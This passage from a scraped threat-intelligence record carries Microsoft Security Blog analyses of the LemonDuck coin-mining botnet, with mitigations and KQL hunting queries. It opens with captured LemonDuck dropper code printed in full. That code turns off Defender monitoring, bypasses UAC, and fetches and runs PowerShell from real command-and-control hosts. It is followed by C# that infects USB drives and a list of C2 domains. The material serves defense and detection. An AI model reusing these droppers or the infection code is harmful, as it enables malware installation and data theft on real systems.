PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. **READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mssecure", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-13T21:11:26", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n![Diagram showing chain of attacks from the LemonDuck and LemonCat infrastructure, detailing specific attacker behavior common to both and highlight behavior unique to each infra](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/attack-chain.png)\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-1.png)\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety names such as the following:\n\n * ackng[.]com\n * bb3u9[.]com\n * ttr3p[.]com\n * zz3r0[.]com\n * sqlnetcat[.]com\n * netcatkit[.]com\n * hwqloan[.]com\n * 75[.]ag\n * js88[.]ag\n * qq8[.]ag\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-2.png)\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN _(used for lateral movement and privilege escalation)\n * _KR.BIN _(used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-3.png)\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-4.png)\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-5.png)\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continuing long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>)to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>)and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>)to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>)and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. [Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution so can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries lets you search for a week's worth of events. To explore up to 30 days worth of raw data to inspect events in your network and locate potential Lemon Duck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change as well as the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with name \u201cSIEX\u201d, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. [Run query in Microsfot 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of LemonDuck seen keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior, however there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security 